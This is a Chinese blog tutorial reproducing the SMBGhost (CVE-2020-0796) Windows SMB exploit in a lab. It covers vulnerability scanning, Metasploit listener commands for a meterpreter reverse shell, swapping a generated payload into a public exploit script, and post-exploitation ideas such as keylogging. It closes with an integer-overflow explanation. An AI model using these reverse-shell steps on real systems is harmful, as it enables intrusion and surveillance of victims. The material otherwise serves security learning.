永恒之黑复现

于 2024-05-07 11:43:53 发布
阅读量2k 收藏 27
点赞数 34
文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67181251/article/details/138526056
版权

永恒之黑复现

一. 永恒之黑介绍

原理

2020年3月,微软公布SMB远程代码执行漏洞(CVE-2020-0796)又称“永恒之黑”,该漏洞由SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,没有检查长度是否合法,最终导致整数溢出,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码,攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

影响对象

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows Server, Version 1903 (Server Core installation)

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows Server, Version 1909 (Server Core installation)
image​​​

二. 漏洞扫描

image

漏洞利用的第一步是判断目标靶机是否存在该漏洞,只要不是0-day漏洞,在微软披露了漏洞之后就会发放相应的补丁,但很多人安全意识较低,不会进行打补丁和预防操作,这就给了攻击者可乘之机。

这里用的是奇安信的漏洞扫描工具。

imageimage​​

显示在目标靶机上存在相应的漏洞。

三. 创建监听任务

我们需要根据目标靶机的ip创建一个监听进程,这里我们使用reverse_tcp,针对自己kali设置相应的ip和端口。

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.172.129
set lport 5555
run

image现在监听任务创建成功

四. 配置payload

攻击的核心在于payload的选择,这里使用网上针对该漏洞的payload,但是需要注意的是由于每个人目标靶机的ip,监听端口和监听方式不同,所以我们需要生成自己的USER_PAYLOAD然后替代下载的exploit.py当中的相应内容。

使用msf生成反弹shell:

imageimage左边的是下载的exploit.py当中的内容,右边是我们自己生成的payload内容,需要进行相应的替换。

接下来使用该exploit对目标靶机进行攻击即可:

image同时我们可以看见在监听终端成功获得shell

image

五. 后渗透攻击

在渗透攻击成功后我们成功获得了系统权限,可以进行一系列的操作。

image

image

比如键盘记录,上传文件,远程监控。。。。。

大家可以在课后自己复现的时候进行相应的查找操作,这是非常有趣的事情。

六. 二进制漏洞介绍

二进制漏洞是可执行文件(PE、ELF文件等)因编码时考虑不周,造成的软件执行了非预期的功能。由于二进制漏洞大都涉及到系统层面,所以危害程度比较高。比如经典的office栈溢出漏洞(CVE-2012-0158)、(CVE-2017-11882)以及(CVE-2017-11882)的补丁绕过漏洞(CVE-2018-0802)等,都是危险程度极高的0day和1day漏洞。

类型包括:

  • 栈溢出漏洞(Stack-Overflow)
  • 堆溢出漏洞(Heap-Overflow)
  • 释放后重引用漏洞(Use-After-Free)
  • 双重释放漏洞(Double-Free)
  • 越界访问漏洞(Out-of-bounds)
  • 整数溢出漏洞

二进制漏洞和之前我们所介绍的web漏洞是两个不同的分支,但是核心目地是一样的就是夺权,进行信息窃取,也是我们网络渗透当中所需要着重学习的地方。

七. 整数溢出漏洞原理

我们所使用的永恒之黑就是基于整数溢出漏洞来实现的,永恒之黑漏洞是由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,没有检查长度是否合法,最终导致整数溢出,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码 。

什么是整数溢出漏洞?

整数溢出漏洞是一种常见的安全问题,它发生在计算机程序的整数运算中。一个整数值超出其能表示的范围时,就会导致整数溢出。例如,在C语言中,一个标准的int类型数据范围是从0x7FFFFFFF到-0x80000000,一旦超过这个范围,就可能产生溢出。

整数溢出可以分为上界溢出和下界溢出两种。上界溢出是指整数值超过了存储空间能表示的最大值,而下界溢出则是指整数值低于存储空间能表示的最小值。

这种类型的漏洞可能导致一些难以预料的结果,甚至可能被恶意攻击者利用,通过控制输入的数值来读取甚至破坏系统的内存位置。例如,攻击者可以确定一个两字节内存分配的地址(称为L),并随后决定代表关键安全特权的内存是L的40字节偏移值(offset)。通过特定的输入,攻击者可以使整数溢出,从而重写任意内存位置,进而执行任意代码。

八. 整数溢出漏洞举例

这里我写了一个简单的验证登录程序从汇编的角度带大家了解一下什么是整数溢出漏洞。

image这是一个简单的验证程序,当输入的第二个参数长度为[4,8]中间的时候会显示验证正确否则验证失败。

image

从汇编的角度是这样的:

imageimage也就是说在这里我们的核心是判断[rbp+passwd_len]的大小,乍一看似乎没有什么问题,但是不知道大家注意到没有。在我们的程序中passwd_len的类型是unsigned char,这个无符号字符型范围是0-255。倘若我们输入的结果大于这个范围结果会怎么样呢?

image

image这里我们输入密码长度为261,最后的结果显示验证码正确,显然这就是整数溢出造成的问题。

现在我们再深入一点从汇编的角度理解这个流程:

image我们现在查看一下这个内存当中的内容,看看到底是多少。

image结果为0x04(16进制),因为整数溢出导致我们的验证程序形同虚设,漏洞利用成功。

ONE_ZJ
关注
  • 34
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒复现(CVE-2020-0796)
weixin_45006525的博客
06-04 1932
漏洞环境虚拟机搭建:迅雷下载 ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/ 适用windows10版本: 适用于32位系统的Windows 10版本1903 Windows 10 1903版(用于基于x64的系统) Windows 10 1903版(用于基于ARM64的系统) Windows Server
【漏洞复习】永恒
syhsa的博客
04-18 1262
总的来说,“永恒”漏洞揭示了网络安全中的一个重要问题,即即使是由政府部门开发的漏洞工具,一旦泄露,也可能被客和恶意分子利用,对网络安全构成严重威胁。“永恒”漏洞利用了微软Windows操作系统中的漏洞,主要是针对 SMB(Server Message Block)协议的漏洞。通过利用这些漏洞,攻击者可以远程执行代码,而无需用户交互,从而控制受感染的计算机。微软在意识到漏洞的严重性后,发布了紧急补丁来修复这些漏洞,建议用户尽快更新其Windows操作系统,以防止受到攻击的风险。
windows10 永恒复现(CVE-2020-0796)
qq_53579360的博客
11-13 1487
永恒复现
永恒 漏洞复现
lianliandad的博客
11-01 912
好好学习
          永恒漏洞复现
Zhaokangkang123的博客
02-15 613
永恒漏洞复现
CVE-2020-0796永恒漏洞复现
Martin-share的博客
02-15 915
2020年3月12日,微软披露了一个最新的SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗称“永恒”。本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。永恒一旦被成功利用,其危害不亚于永恒之蓝。受影响版本:set lhost。
永恒之蓝复现kaliwin7
最新发布
07-19
### 恒之蓝漏洞复现:Kali Linux 攻击 Windows 7 #### 实验背景及目的 “永恒之蓝”(EternalBlue)是一种针对 Windows 操作系统的严重漏洞,该漏洞允许攻击者在无需用户交互的情况下实现远程代码执行。本次实验...
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透测试是一种重要的网络安全评估方法...对于特定的漏洞如“永恒之蓝”,了解其工作原理和复现过程,对于提高网络安全防护至关重要。同时,测试报告的编写也是整个过程的成果展示,为防御者提供了改进安全策略的依据。
numpy复现xgboost算法内含数据集
10-16
本主题将深入探讨如何使用基础的NumPy库来复现XGBoost算法的核心概念,这对于理解其工作原理和进行性能优化非常有帮助。 XGBoost全称为“Extreme Gradient Boosting”,它是在梯度提升框架下实现的一种集成学习方法...
Windows 10 永恒(CVE-2020-0796)复现过程 完整版
热门推荐
PigLL的博客
08-15 1万+
实验环境 目标机:Windows 10(CVE-2020-0796漏洞版) 攻击机:Kali 实验环境均在虚拟机中进行,模式为NAT模式,使他们处于同一网段中。 1.首先关闭windows 10 更新服务和防火墙 开始菜单–设置–更新与安全 然后右键我的电脑–服务–找到Windows update–选择禁用 之后点击开始菜单–设置–Windows安全中心 把下面选项全部关闭 2.开启Admintrator账户 右键我的电脑–管理–本地用户和组–用户–双击administrator–把账户已禁用勾掉
Win10-永恒漏洞复现
网安小白的博客
09-19 2782
win10永恒漏洞复现,图文详解
CVE-2020-0796 WIN10 永恒漏洞复现
干铮的博客
08-14 1594
1.禁用windows update 2.关闭windows防火墙 3.主机发现 Vulnerable 代表易攻击 也可以把ip改为 10.3.139.0/24扫描网段 4.用msfvenom生成python类型的shellcode 5.复制所有值,然后将buf替换成USER_PAYLOAD,然后粘贴到exp文件中替换掉之前的 6.MSF监听4444端口 use exploit/multi/handler set payload windows/x64...
CVE-2020-0976永恒漏洞复现
qq_36918532的博客
03-13 4035
漏洞原理 SMB远程代码执行漏洞 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受客攻击的目标系统只需开机在线即可能被入侵。 影响版本 Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标 漏洞所需工具 漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0
【漏洞复现】CVE-2020-0796永恒漏洞复现
weixin_67698311的博客
06-18 2407
Windows 10 和Windows Server 2016引入了SMB 3.1.1.本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。3.使用工具检查靶机是否存在漏洞,检查工具下载地址https://github.com/ollypwn/SMBGhost运行结果如下图,证明靶机存在漏洞,Vulnerable代表目标存在漏洞,可以进行攻击!4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务。
CVE-2020-0796(永恒)漏洞复现
m0_73263892的博客
06-30 628
靶机:win 10攻击机:kalipython脚本:链接:https://pan.baidu.com/s/1GgInswJJC2RkSGdJk1_V5g?pwd=kt4r提取码:kt4r。
kali复现CVE-2020-0796 永恒
m0_57856283的博客
03-13 4062
3.1 永恒简介 2017 年,“永恒之蓝”,3 年之后,“永恒” 来了; 介绍:3 月 12 日, 微软披露了一个最新的 SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗 称“永恒”。 本漏洞源于 SMBv3 没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击 SMB 服务端远程执行任意恶意代码,亦可通过构建恶意 SMB 服务端...
永恒之蓝漏洞复现流程
09-01
永恒之蓝漏洞的复现流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,使用`search ms17_010`命令搜索永恒之蓝漏洞的相关代码。你会找到两个工具,其中`auxiliary/scanner/smb/smb_ms17_010`是用于扫描漏洞的模块,`exploit/windows/smb/ms17_010_eternalblue`是用于攻击的代码。一般情况下,你需要先使用扫描模块,如果显示存在漏洞,再使用攻击代码进行攻击。 4. 配置攻击目标IP,使用命令`use exploit/windows/smb/ms17_010_eternalblue`选择攻击模块。 5. 接下来,你需要使用该模块对靶机服务器进行攻击。使用命令`set RHOSTS <靶机IP>`来配置目标IP。 6. 最后,执行攻击命令,例如使用`exploit`命令开始攻击。 需要注意的是,复现永恒之蓝漏洞属于安全研究领域,只应在合法的环境下进行,并遵守相关法律法规。在实际环境中,应该始终保持系统和软件的更新,以免存在已知漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值